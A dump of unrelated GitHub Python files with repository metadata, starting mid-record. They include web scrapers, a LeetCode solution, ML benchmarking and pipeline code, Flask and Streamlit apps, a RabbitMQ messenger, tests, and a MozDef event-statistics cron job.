'http://www.volleymsk.ru/ap/members.php?id=7983'\npage = requests.get(lastURL, headers=HEADERS)\nsoup = BeautifulSoup(page.content, 'html.parser')\ntables = soup.find_all('table')[4]\ntable = tables.find_all('table')[7]\ninfo = (' '.join(table.text.split()).split('Игрок'))\nif 'Тренер' in ' '.join(info):\n info = ' '.join(table.text.split()).split('Тренерский')[0].split('Игрок')\nteam_info = info[0]\nplayers = info[2:]\nnums = re.findall(r'\\b\\d+\\b', team_info)\ninf = {\n 'Команда': ' '.join(team_info.split(':')[1].split()[:-1]),\n 'Рост': nums[-3],\n 'Возраст': f'{nums[-2]}.{nums[-1]}'\n}\nfor i in players:\n player = {\n 'Команда': ' '.join(team_info.split(':')[1].split()[:-1]),\n 'ФИО': ' '.join(i.split(':')[1].split()[:-1]),\n 'Рост': i.split(':')[2].split()[0],\n 'Мастерство': re.findall(r'[А-Я][а-я]*', i.split(':')[-2])[0] if i.count(':') == 4 else i.split(':')[-1],\n 'Год рождения': i.split(':')[-1].strip() if i.count(':') == 4 else None\n }\n print(player)\nfor k, v in inf.items():\n print(k, ':', type(v))\nprint(round(float(inf['Возраст'])))","repo_name":"2haed/lvl_parser","sub_path":"app/parser/async_team_info_parser.py","file_name":"async_team_info_parser.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"6203533960","text":"# 279. Perfect Squares\n# medium\n\nclass Solution:\n def numSquares(self, n: 'int') -> 'int':\n cnts = [n] * (n + 1)\n cnts[0] = 0\n for i in range(1, n + 1):\n for j in range(1, int(math.sqrt(i)) + 1):\n cnts[i] = min(cnts[i], cnts[i - j ** 2] + 1)\n return cnts[n]\n","repo_name":"moyuanhuang/leetcode","sub_path":"dp/perfect_squares.py","file_name":"perfect_squares.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"13253114740","text":"from tqdm import tqdm\nfrom transformers.pipelines.pt_utils import KeyDataset\n\ndef get_predictions_via_generation_pipeline(HF_dataset, model_name, min_length=5, max_length=128, device=0, batch_size=16):\n\t\n\t\"\"\"\n\tdata: list of strings\n\tmodel_name: string\n\treturn_all_scores: str: \"ditribution\", for all; \"present\" for above threshold\n\tmax_length: int\n\ttruncation: bool\n\t\"\"\"\n\t\n\tfrom transformers import pipeline\n\n\t\n\tpipe = pipeline(\n\t task=\"text2text-generation\",\n\t model=model_name, \n\t tokenizer=model_name,\n\t device=device,\n\t)\n\n\tpredictions = []\n\tfor out in tqdm(pipe(KeyDataset(HF_dataset, \"dreams\"), min_length=min_length, max_length=max_length, batch_size=batch_size)):\n\t predictions.append(out[0][\"generated_text\"])\n\n\treturn predictions","repo_name":"lorenzoscottb/DReAMy","sub_path":"dreamy/util/generation_pipeline.py","file_name":"generation_pipeline.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"45"} +{"seq_id":"30685498250","text":"# -*- encoding: utf-8 -*-\n\"\"\"Config oauth.\n\nVARS:\n\nREDIS_HOST = 'redis'\nREDIS_PORT = 6379\nJWT_SECRET = 'secret'\nLDAP = 'ldap:10389'\nROOT_PW = 'secret'\nROOT_DN = 'uid=admin,ou=system'\nDOMAIN = 'dc=example,dc=com'\nUSERFILTER = 'mail={username},ou=users,dc=example,dc=com'\nMANAGER = 'admin@tickdi.com'\n\nCORS = 'http://localhost:4200,https://example.com'\nDEBUG = True\nSMTP_SERVER = '---''\nSMTP_PORT = 587\nSMTP_USER = '---'\nSMTP_PW = '---'\nSMTP_TLS = True\nSMTP_SSL = False\n\n\"\"\"\n\nimport os\nimport json\n\nREDISHOST = os.environ.get('REDIS_HOST', 'redis')\nREDISPORT = int(os.environ.get('REDIS_PORT', \"tcp://x.x.x.x:6379\").split(\":\")[-1])\nJWTSECRET = os.environ.get('JWT_SECRET', 'secret')\nLDAP = os.environ.get('LDAP', 'ldap:10389')\nROOTPW = os.environ.get('ROOT_PW', 'secret')\nROOTDN = os.environ.get('ROOT_DN', 'uid=admin,ou=system')\nDOMAIN = os.environ.get('DOMAIN', 'dc=example,dc=com')\nUSERFILTER = os.environ.get(\n 'USER_FILTER', 'mail={username},ou=users,dc=example,dc=com')\nMANAGER = os.environ.get('MANAGER', 'admin@example.com')\nCORS = os.environ.get('CORS', ['http://localhost:4200','https://example.com'])\nDEBUG = os.environ.get('DEBUG', True)\nSMTPSERVER = os.environ.get(\n 'SMTP_SERVER', 'smtp.gmail.com')\nSMTPPORT = int(os.environ.get('SMTP_PORT', 587))\nSMTPUSER = os.environ.get('SMTP_USER', '---')\nSMTPPW = os.environ.get(\n 'SMTP_PW', '---')\nSMTPTLS = bool(os.environ.get('SMTP_TLS', 'True').upper() == 'TRUE')\nSMTPSSL = bool(os.environ.get('SMTP_SSL', 'False').upper() == 'FALSE')\n\nwith open(\"config.json\") as fp:\n config = json.load(fp)\n\nconfig['jwtsecret'] = JWTSECRET\nconfig['redis.host'] = REDISHOST\nconfig['redis.port'] = str(REDISPORT)\nconfig['ldap.server'] = LDAP\nconfig['ldap.config_server'] = LDAP\nconfig['ldap.config_root_pw'] = ROOTPW\nconfig['ldap.root_pw'] = ROOTPW\n\nconfig['ldap.root_dn'] = ROOTDN\nconfig['ldap.config_root_dn'] = ROOTDN\n\nconfig['ldap.user_filter'] = USERFILTER\nconfig['ldap.base_dn'] = DOMAIN\nconfig['ldap.config_dn'] = 'ou=config,%s' % DOMAIN\n\nconfig['manager'] = MANAGER\n\nconfig['cors'] = CORS\nconfig['debug'] = 'True' if DEBUG else 'False'\n\nconfig['mail.host'] = SMTPSERVER\nconfig['mail.port'] = str(SMTPPORT)\nconfig['mail.username'] = SMTPUSER\nconfig['mail.password'] = SMTPPW\nconfig['mail.tls'] = 'True' if SMTPTLS else 'False'\nconfig['mail.ssl'] = 'True' if SMTPSSL else 'False'\n\nwith open('config.json', 'w') as configfile:\n json.dump(config, configfile, sort_keys=True, indent=4, separators=(',', ': '))\n","repo_name":"pyrenees/plone.oauth","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26834593783","text":"import flask\nimport libgenapi\nimport json\nfrom urllib.request import urlopen as uReq\nimport requests\nfrom bs4 import BeautifulSoup as soup\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

    Distant Reading Archive

    This site is a prototype API for distant reading of science fiction novels.

    \"\n\n\ndef url_opener(mirror):\n\turl=mirror\n\tuClient=uReq(url)\n\tpage_html=uClient.read()\n\tuClient.close()\n\tpage_soup=soup(page_html,\"html.parser\")\n\tcontainers=page_soup.find(\"div\",{\"class\":\"book-info\"})\n\tname=containers.find(\"div\",{\"class\":\"book-info__title\"}).text\n\tdownload_class=containers.find(\"div\",{\"class\":\"book-info__download\"})\n\tlink=download_class.find('a').get(\"href\")\n\t#print(name)\n\t#print(link)\n\tmagic_no=link[10:]\n\t#print(magic_no)\n\tdowloader_url=\"https://libgen.pw/download/book/\"+magic_no\n\treturn (name,dowloader_url)\n#\tr=requests.get(dowloader_url,stream=True)\n#\twith open(name+\".pdf\",\"wb\") as pdf: \n#\t for chunk in r.iter_content(chunk_size=1024): \n#\t # writing one chunk at a time to pdf file \n#\t if chunk: \n#\t pdf.write(chunk) \n\n@app.route('/search/', methods=['GET'])\ndef api_id(name):\n\n\tlg=libgenapi.Libgenapi([\"http://libgen.io/\",\"http://gen.lib.rus.ec\"]) \n\t#name=input(\"Enter the name of the book: \")\n\toutput=lg.search(name);\n\t#json_output=json.load(output)\n\tjson_output=json.dumps (output, sort_keys=True,indent=4)\n\t#print(json_output)\n\tloaded_data=json.loads(json_output)\n\tresult=[]\n\tfor data in loaded_data:\n\t\tif(data[\"mirrors\"]!=None):# and (data[\"extension\"]==\"pdf\" or data[\"extension\"]==\"epub\")):\n\t\t\tfor mirror in data[\"mirrors\"]:\n\t\t\t\tif(mirror.startswith(\"http://libgen.pw\")):\n\t\t\t\t\tprint(mirror)\n\t\t\t\t\tname,url=url_opener(mirror)\n\t\t\t\t\tprint(name)\n\t\t\t\t\tprint(url)\n\t\t\t\t\tresult.append({\"name\":name,\n\t\t\t\t\t\t\t\t\t\"url\":url})\n\t\t\t\t\tprint(\"\\n\\n\")\n\tresult=json.dumps(result,indent=2)\n\treturn (result)\n\n\n\napp.run()","repo_name":"ArpitKubadia/thetreeofknowledge","sub_path":"backend_searching.py","file_name":"backend_searching.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"398217914","text":"import json\nimport subprocess\nimport os\n\ndef main():\n with open('images/info.json', 'r', encoding='utf-8') as f:\n info = json.load(f)\n info_short = []\n dateOld = \"\"\n for dt in info['short']:\n filename = dt[\"fileName\"]\n playTime = dt[\"playTime\"]\n time1 = playTime[0][0] * 60 + playTime[0][1]\n time2 = playTime[1][0] * 60 + playTime[1][1]\n thumbTime = dt['thumbnailTime']\n comment = dt[\"comment\"]\n date = dt[\"date\"]\n if date != dateOld:\n count = 0\n else:\n count += 1\n new_filename = f\"{date}_{count}.mp4\"\n #cmd = f\"ffmpeg -ss {time1} -to {time2} -i images/images/{filename} -c copy images/images/{new_filename}\"\n cmd = f\"ffmpeg -ss {time1} -to {time2} -i images/images/{filename} images/images/{new_filename}\"\n dateOld = date\n #if not os.path.exists(f'images/images/{new_filename}'):\n # subprocess.run(cmd)\n timeThumbSec = (thumbTime[0] * 60 + thumbTime[1]) - time1\n totalTime = time2 - time1\n if timeThumbSec == totalTime:\n timeThumbSec -= 0.1\n timeThumbMin = timeThumbSec // 60\n timeThumbSec = timeThumbSec % 60\n totalTimeMin = totalTime // 60\n totalTimeSec = totalTime % 60\n xxx = {\"fileName\": new_filename,\n \"comment\": comment,\n \"date\": date,\n \"thumbnailFile\": new_filename,\n \"thumbnailTime\": [timeThumbMin, timeThumbSec],\n \"totalTime\" : [totalTimeMin, totalTimeSec]\n }\n info_short.append(xxx)\n with open(\"images/info_short_2.json\", \"w\", encoding=\"utf-8\") as f:\n json.dump(info_short, f, ensure_ascii=False, indent=2)\n\nif __name__ == '__main__':\n main()","repo_name":"yutera12/movie_player","sub_path":"cutMovies.py","file_name":"cutMovies.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15751653985","text":"import pika\nimport json\nimport threading\nimport uuid\nfrom exchange import json_generic\n\n\nclass Event(json_generic.JSONSerializibleMixin):\n\n def __init__(self):\n self.name = type(self).__name__\n\n def is_an(self, event_class):\n return type(self).__name__ == event_class.__name__\n\n\ndef message_handler(callback):\n def handler(ch, method, properties, body):\n event = json_generic.decode(body.decode(\"utf-8\"))\n response = callback(event)\n if response and properties.reply_to:\n response_json = json_generic.encode(response)\n ch.basic_publish(exchange='',\n routing_key=properties.reply_to,\n properties=pika.BasicProperties(correlation_id=properties.correlation_id),\n body=response_json)\n return handler\n\n\nclass Messenger(object):\n def __init__(self, message_broker_host):\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=message_broker_host))\n self.channel = self.connection.channel()\n self.channel.exchange_declare(exchange='frontend', type='fanout')\n self.channel.exchange_declare(exchange='backend', type='direct')\n\n self.response_queue = self.channel.queue_declare(exclusive=True).method.queue\n self.response_callbacks = {}\n self.channel.basic_consume(self._process_response, no_ack=True, queue=self.response_queue)\n\n self.consume_thread = None\n\n def _process_response(self, ch, method, properties, body):\n if properties.correlation_id in self.response_callbacks:\n event = json_generic.decode(body.decode(\"utf-8\"))\n\n self.response_callbacks[properties.correlation_id](event)\n del(self.response_callbacks[properties.correlation_id])\n\n def _add_response_callback(self, callback):\n correlation_id = str(uuid.uuid4())\n self.response_callbacks[correlation_id] = callback\n return pika.BasicProperties(\n reply_to=self.response_queue,\n correlation_id=str(correlation_id)\n )\n\n def subscribe_frontend(self, callback):\n queue = self.channel.queue_declare(exclusive=True).method.queue\n self.channel.queue_bind(exchange='frontend', queue=queue)\n self.channel.basic_consume(message_handler(callback), queue=queue, no_ack=True)\n\n def subscribe_backend(self, subscriber_name, callback):\n queue = self.channel.queue_declare(exclusive=True).method.queue\n self.channel.queue_bind(exchange='backend', queue=queue, routing_key=subscriber_name)\n self.channel.basic_consume(message_handler(callback), queue=queue, no_ack=True)\n\n def publish_to_frontend(self, event, response_callback=None):\n event_json = json_generic.encode(event)\n properties = None\n if response_callback:\n properties = self._add_response_callback(response_callback)\n self.channel.basic_publish(exchange='frontend', routing_key='',\n body=event_json, properties=properties)\n\n def publish_to_backend(self, subscriber_name, event, response_callback=None):\n event_json = json_generic.encode(event)\n properties = None\n if response_callback:\n properties = self._add_response_callback(response_callback)\n self.channel.basic_publish(exchange='backend', routing_key=subscriber_name,\n body=event_json, properties=properties)\n\n def wait_for_messages(self, non_blocking=True):\n if non_blocking:\n self.consume_thread = threading.Thread(target=self.channel.start_consuming)\n self.consume_thread.start()\n else:\n self.channel.start_consuming()\n","repo_name":"ijwfly/kreacher-automator-pi","sub_path":"exchange/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17371975341","text":"import numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nimport cv2\r\nimport streamlit.components.v1 as components\r\n#https://github.com/madhav727/medium/blob/master/finger_counting_video.py\r\n@st.cache()\r\ndef skinmask(img):\r\n hsvim = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n lower = np.array([0, 48, 80], dtype = \"uint8\")\r\n upper = np.array([20, 255, 255], dtype = \"uint8\")\r\n skinRegionHSV = cv2.inRange(hsvim, lower, upper)\r\n blurred = cv2.blur(skinRegionHSV, (2,2))\r\n ret, thresh = cv2.threshold(blurred,0,255,cv2.THRESH_BINARY)\r\n return thresh\r\n@st.cache()\r\ndef getcnthull(mask_img):\r\n contours, hierarchy = cv2.findContours(mask_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n contours = max(contours, key=lambda x: cv2.contourArea(x))\r\n hull = cv2.convexHull(contours)\r\n return contours, hull\r\n@st.cache()\r\ndef getdefects(contours):\r\n hull = cv2.convexHull(contours, returnPoints=False)\r\n defects = cv2.convexityDefects(contours, hull)\r\n return defects\r\nst.title(\"ASL Translation Data Mining Project FALL2020\")\r\n\r\nst.header(\"By: Hanna Bowman, Mark Dobres, Matt Zenner \")\r\n\r\nst.write()\r\n\r\n\r\ncomponents.iframe(\"https://docs.google.com/document/d/13GSd2RFZXFlBHFAm_6_8_XLbOHc8OB1JF41P7_0Z5go/edit?usp=sharing\", height=900 )\r\n\r\n\r\nst.subheader(\"Translation from live video to text: \")\r\n\r\n\r\n\r\nif st.button(\"Begin...\"):\r\n st.success(\"Press Q to exit camera\")\r\n cap = cv2.VideoCapture(0) # '0' for webcam\r\n while cap.isOpened():\r\n _, img = cap.read()\r\n try:\r\n mask_img = skinmask(img)\r\n contours, hull = getcnthull(mask_img)\r\n cv2.drawContours(img, [contours], -1, (255,255,0), 2)\r\n cv2.drawContours(img, [hull], -1, (0, 255, 255), 2)\r\n defects = getdefects(contours)\r\n if defects is not None:\r\n cnt = 0\r\n for i in range(defects.shape[0]): # calculate the angle\r\n s, e, f, d = defects[i][0]\r\n start = tuple(contours[s][0])\r\n end = tuple(contours[e][0])\r\n far = tuple(contours[f][0])\r\n a = np.sqrt((end[0] - start[0]) ** 2 + (end[1] - start[1]) ** 2)\r\n b = np.sqrt((far[0] - start[0]) ** 2 + (far[1] - start[1]) ** 2)\r\n c = np.sqrt((end[0] - far[0]) ** 2 + (end[1] - far[1]) ** 2)\r\n angle = np.arccos((b ** 2 + c ** 2 - a ** 2) / (2 * b * c)) # cosine theorem\r\n if angle <= np.pi / 2: # angle less than 90 degree, treat as fingers\r\n cnt += 1\r\n cv.circle(img, far, 4, [0, 0, 255], -1)\r\n if cnt > 0:\r\n cnt = cnt+1\r\n cv2.putText(img, str(cnt), (0, 50), cv.FONT_HERSHEY_SIMPLEX,1, (255, 0, 0) , 2, cv.LINE_AA)\r\n cv2.imshow(\"img\", img)\r\n except:\r\n pass\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n break\r\n","repo_name":"PrismShake/dm_project_bowman","sub_path":"appThree.py","file_name":"appThree.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"75423427976","text":"import numpy as np\nimport pytest\nfrom skvalidate.io import walk\nimport skvalidate.io as skio\n\n\n@pytest.mark.parametrize('input_file,names,types,unpack_fields', [\n (\n 'tests/samples/test_1.root',\n ['test;1.i', 'test;1.x', 'test;1.y', 'test;1.z', 'test;1.v', 'test;1.string'],\n [np.int32, np.float32, np.float32, np.float32, np.float32, np.object_],\n False,\n ),\n (\n 'tests/samples/test_2.root',\n ['test;1.i', 'test;1.x', 'test;1.y', 'test;1.z', 'test;1.v', 'test;1.string'],\n [np.int32, np.float32, np.float32, np.float32, np.float32, np.object_],\n False,\n ),\n (\n 'tests/samples/test_3.root',\n ['test;1.i', 'test;1.x', 'test;1.y', 'test;1.z', 'test;1.v', 'test;1.a'],\n [np.int32, np.float32, np.float32, np.float32, np.float32, np.float32],\n False,\n ),\n (\n 'tests/samples/objects.root',\n [\n 'Events;1.MyEvent.TObject.fBits',\n 'Events;1.MyEvent.TObject.fUniqueID',\n 'Events;1.MyEvent.eventID',\n 'Events;1.MyEvent.ayes.end_ns',\n 'Events;1.MyEvent.ayes.start_ns',\n 'Events;1.MyEvent.bees.driftTime',\n 'Events;1.MyEvent.bees.xyPosition',\n 'Events;1.MyEvent.bees.xyzPosition',\n ],\n [\n np.uint32, np.uint32, np.uint32,\n np.float32, np.float32,\n np.float32,\n np.float64, np.float64,\n np.float64, np.float64, np.float64\n ],\n False,\n ),\n (\n 'tests/samples/objects.root',\n [\n 'Events;1.MyEvent.TObject.fBits',\n 'Events;1.MyEvent.TObject.fUniqueID',\n 'Events;1.MyEvent.eventID',\n 'Events;1.MyEvent.ayes.end_ns',\n 'Events;1.MyEvent.ayes.start_ns',\n 'Events;1.MyEvent.bees.driftTime',\n 'Events;1.MyEvent.bees.xyPosition.fX',\n 'Events;1.MyEvent.bees.xyPosition.fY',\n 'Events;1.MyEvent.bees.xyzPosition.fX',\n 'Events;1.MyEvent.bees.xyzPosition.fY',\n 'Events;1.MyEvent.bees.xyzPosition.fZ',\n ],\n [\n np.uint32, np.uint32, np.uint32,\n np.float32, np.float32,\n np.float32,\n np.float64, np.float64,\n np.float64, np.float64, np.float64\n ],\n True,\n ),\n (\n 'tests/samples/non_tree_objects.root',\n ['1Dhist;1', '2Dhist;1'],\n [np.int32, np.float32],\n False,\n ),\n])\ndef test_walk(input_file, names, types, unpack_fields):\n result = list(walk(input_file, unpack_fields))\n assert len(result) == len(names)\n\n for name, array in result:\n assert name in names\n if hasattr(array, 'dtype'):\n assert array.dtype == types[names.index(name)]\n\n\n@pytest.mark.parametrize('input_file,expected_len', [\n ('tests/samples/objects.root', 1000),\n ('tests/samples/test_1.root', 10000),\n ('tests/samples/test_3.root', 10000),\n])\ndef test_load_array(input_file, expected_len):\n file_keys = skio.recursive_keys(input_file)\n for array_name in file_keys:\n array = skio.load_array(input_file, array_name)\n assert array is not None\n assert len(array) == expected_len\n\n\ndef test_load_array_from_object():\n input_file = 'tests/samples/objects.root'\n array_names = [\n 'Events;1.MyEvent.bees.xyzPosition.fX',\n 'Events;1.MyEvent.bees.xyzPosition.fY',\n 'Events;1.MyEvent.bees.xyzPosition.fZ',\n ]\n for array_name in array_names:\n tokens = array_name.split('.')\n obj_path = '.'.join(tokens[:-1])\n var = tokens[-1]\n array = skio.load_array(input_file, array_name)\n array2 = skio.load_array(input_file, obj_path)\n assert array is not None\n assert len(array) == 1000\n assert np.all(array == array2[var])\n","repo_name":"FAST-HEP/scikit-validate","sub_path":"tests/io/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"73172793417","text":"from __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport argparse\r\nimport math\r\nimport time\r\nimport importlib\r\n\r\nimport pdb\r\nimport torch\r\nfrom torch import nn\r\n\r\nTIME_SCALES = {'s': 1, 'ms': 1000, 'us': 1000000}\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('example', choices=['py', 'cpp', 'cuda', 'torch_lib'])\r\nparser.add_argument('-b', '--batch-size', type=int, default=32)\r\nparser.add_argument('-f', '--features', type=int, default=650)\r\nparser.add_argument('-s', '--state-size', type=int, default=1300)\r\nparser.add_argument('-r', '--runs', type=int, default=100)\r\nparser.add_argument('--scale', choices=['s', 'ms', 'us'], default='us')\r\nparser.add_argument('-c', '--cuda', action='store_true')\r\nparser.add_argument('-d', '--double', action='store_true')\r\noptions = parser.parse_args()\r\n\r\nif options.example == 'py':\r\n from python.gru_baseline import GRUCell \r\nelif options.example == 'torch_lib':\r\n i = \"do nothing\"\r\nelif options.example == 'cpp':\r\n from cpp.gru import GRUCell\r\nelse:\r\n from cuda.gru import GRUCell\r\n options.cuda = True\r\n\r\ndevice = torch.device(\"cuda\") if options.cuda else torch.device(\"cpu\")\r\ndtype = torch.float64 if options.double else torch.float32\r\n\r\nkwargs_hidden = {'dtype': dtype,\r\n 'device': device,\r\n 'requires_grad': True}\r\n\r\nkwargs_input = {'dtype': dtype,\r\n 'device': device,\r\n 'requires_grad': False}\r\n\r\nX = torch.randn(options.batch_size, options.features, **kwargs_input)\r\nh = torch.randn(options.batch_size, options.state_size, **kwargs_hidden)\r\n\r\nif options.example == 'torch_lib':\r\n rnn = nn.GRUCell(options.features, options.state_size).to(device, dtype)\r\nelse:\r\n rnn = GRUCell(options.features, options.state_size).to(device, dtype)\r\n\r\n# Force CUDA initialization\r\nnew_h = rnn(X, h)\r\nnew_h.sum().backward()\r\n\r\nforward_min = math.inf\r\nforward_time = 0\r\nbackward_min = math.inf\r\nbackward_time = 0\r\n\r\nfor _ in range(options.runs):\r\n rnn.zero_grad()\r\n\r\n start = time.time()\r\n new_h = rnn(X, h)\r\n elapsed = time.time() - start\r\n forward_min = min(forward_min, elapsed)\r\n forward_time += elapsed\r\n\r\n start = time.time()\r\n new_h.sum().backward()\r\n elapsed = time.time() - start\r\n backward_min = min(backward_min, elapsed)\r\n backward_time += elapsed\r\n\r\nscale = TIME_SCALES[options.scale]\r\nforward_min *= scale\r\nbackward_min *= scale\r\nforward_average = forward_time / options.runs * scale\r\nbackward_average = backward_time / options.runs * scale\r\n\r\nprint('Forward: %.3f us, backward: %.3f us' % (forward_average, backward_average))\r\n","repo_name":"kevinghst/GRU-CUDA","sub_path":"gru/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"45"} +{"seq_id":"3566752918","text":"from flask import Flask\nfrom flask import render_template # 渲染\nfrom flask import request\napp = Flask(__name__)\n\nimport search\n\n@app.route('/') # 主页地址,“装饰器”\ndef reviews():\n the_news = {\n 'XXX1': '1',\n 'XXX2': '2',\n 'XXX3': '3',\n 'XXX4': '4',\n }\n context = {\n 'title': 'Review Search Engine',\n 'the_news': the_news,\n }\n return render_template('index.html', context=context) #\n\n\n@app.route('/search_method', methods=['GET', 'POST'])\ndef search_method():\n keyword = request.form['keyword']\n label = search.get_predictions(keyword)\n result = search.search(keyword,label)\n\n the_news = result\n context = {\n 'title': 'Review Search Engine',\n 'the_reviews': the_news,\n }\n return render_template('index.html', context=context) #\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, port=80) #\n","repo_name":"Xanxus1111/IR_search_engine","sub_path":"searchWebsite.py","file_name":"searchWebsite.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71493632456","text":"import json\nimport logging\nimport os\nimport pyes\nimport pytz\nimport sys\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom configlib import getConfig, OptionParser\nfrom logging.handlers import SysLogHandler\nfrom dateutil.parser import parse\n\nlogger = logging.getLogger(sys.argv[0])\n\n\ndef loggerTimeStamp(self, record, datefmt=None):\n return toUTC(datetime.now()).isoformat()\n\n\ndef initLogger():\n logger.level = logging.INFO\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n formatter.formatTime = loggerTimeStamp\n if options.output == 'syslog':\n logger.addHandler(\n SysLogHandler(address=(options.sysloghostname,\n options.syslogport)))\n else:\n sh = logging.StreamHandler(sys.stderr)\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n\n\ndef toUTC(suspectedDate, localTimeZone=None):\n '''make a UTC date out of almost anything'''\n utc = pytz.UTC\n objDate = None\n if localTimeZone is None:\n localTimeZone=options.defaulttimezone\n if type(suspectedDate) == str:\n objDate = parse(suspectedDate, fuzzy=True)\n elif type(suspectedDate) == datetime:\n objDate = suspectedDate\n\n if objDate.tzinfo is None:\n objDate = pytz.timezone(localTimeZone).localize(objDate)\n objDate = utc.normalize(objDate)\n else:\n objDate = utc.normalize(objDate)\n if objDate is not None:\n objDate = utc.normalize(objDate)\n\n return objDate\n\n\ndef esSearch(es, begindateUTC=None, enddateUTC=None):\n resultsList = list()\n if begindateUTC is None:\n begindateUTC = toUTC(datetime.now() - timedelta(minutes=options.aggregationminutes))\n if enddateUTC is None:\n enddateUTC = toUTC(datetime.now())\n try:\n # search for events within the date range that haven't already been alerted (i.e. given an alerttimestamp)\n qDate = pyes.RangeQuery(qrange=pyes.ESRange('utctimestamp', from_value=begindateUTC, to_value=enddateUTC))\n q = pyes.ConstantScoreQuery(pyes.MatchAllQuery())\n q = pyes.FilteredQuery(q,pyes.BoolFilter(must=[qDate]))\n \n q=q.search()\n \n qagg = pyes.aggs.TermsAgg(name='category', field='category')\n q.agg.add(qagg)\n results=es.search(query=q,indices=['events'])\n \n mozdefstats=dict(utctimestamp=toUTC(datetime.now()).isoformat())\n mozdefstats['summary']='Aggregated category counts'\n mozdefstats['processid']=os.getpid()\n mozdefstats['processname']=sys.argv[0]\n mozdefstats['details']=dict(counts=list())\n for bucket in results.aggs['category']['buckets']:\n entry=dict()\n entry[bucket['key']]=bucket['doc_count']\n mozdefstats['details']['counts'].append(entry)\n return mozdefstats\n\n except pyes.exceptions.NoServerAvailable:\n logger.error('Elastic Search server could not be reached, check network connectivity')\n\n\ndef main():\n '''\n Get aggregated statistics on incoming events\n to use in alerting/notices/queries about event patterns over time\n '''\n logger.debug('starting')\n logger.debug(options)\n es = pyes.ES(server=(list('{0}'.format(s) for s in options.esservers)))\n stats = esSearch(es)\n logger.debug(json.dumps(stats))\n try:\n # post to elastic search servers directly without going through\n # message queues in case there is an availability issue\n es.index(index='events',\n doc_type='mozdefstats',\n doc=json.dumps(stats),\n bulk=False)\n\n except Exception as e:\n logger.error(\"Exception %r when gathering statistics \" % e)\n\n logger.debug('finished')\n\n\ndef initConfig():\n # output our log to stdout or syslog\n options.output = getConfig('output', 'stdout', options.configfile)\n # syslog hostname\n options.sysloghostname = getConfig('sysloghostname',\n 'localhost',\n options.configfile)\n # syslog port\n options.syslogport = getConfig('syslogport', 514, options.configfile)\n\n\n # change this to your default zone for when it's not specified\n options.defaulttimezone = getConfig('defaulttimezone',\n 'UTC',\n options.configfile)\n\n # elastic search server settings\n options.esservers = list(getConfig('esservers',\n 'http://localhost:9200',\n options.configfile).split(','))\n \n # field to use as the aggegation point (category, _type, etc)\n options.aggregationfield = getConfig('aggregationfield',\n 'category',\n options.configfile)\n\n # default time period in minutes to look back in time for the aggregation\n options.aggregationminutes = getConfig('aggregationminutes',\n 15,\n options.configfile)\n\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option(\n \"-c\",\n dest='configfile',\n default=sys.argv[0].replace('.py', '.conf'),\n help=\"configuration file to use\")\n (options, args) = parser.parse_args()\n initConfig()\n initLogger()\n main()\n","repo_name":"Thang1102/MozDef_1v10","sub_path":"cron/eventStats.py","file_name":"eventStats.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1078298475","text":"# coding: utf-8\r\nfrom ShortDetect import get_key_frames\r\nfrom img2txt import *\r\nimport cv2\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom Word2VectTextRank import summarize\r\n\r\ndef video2txt(video_path, save_key_frame=False):\r\n '''\r\n @input: \r\n '''\r\n PATH = os.path.split(os.path.realpath(video_path))[0] + '/'\r\n \r\n # 生成关键帧\r\n key_frames, IMG_SIZE = get_key_frames(video_path)\r\n\r\n # 存储关键帧到硬盘\r\n # if save_key_frame:\r\n # print('\\n--saving key frames...')\r\n # key_frame_path = os.path.join(PATH + 'key_frames')\r\n # if not os.path.exists(key_frame_path):\r\n # os.makedirs(key_frame_path)\r\n # for i, frame in enumerate(key_frames):\r\n # kf_path = os.path.join(key_frame_path + '/' + str(i) + '.jpg')\r\n # if not os.path.exists(kf_path):\r\n # cv2.imwrite(kf_path, frame)\r\n # print('--{} saved.'.format(kf_path))\r\n\r\n # 模型加载\r\n opt = 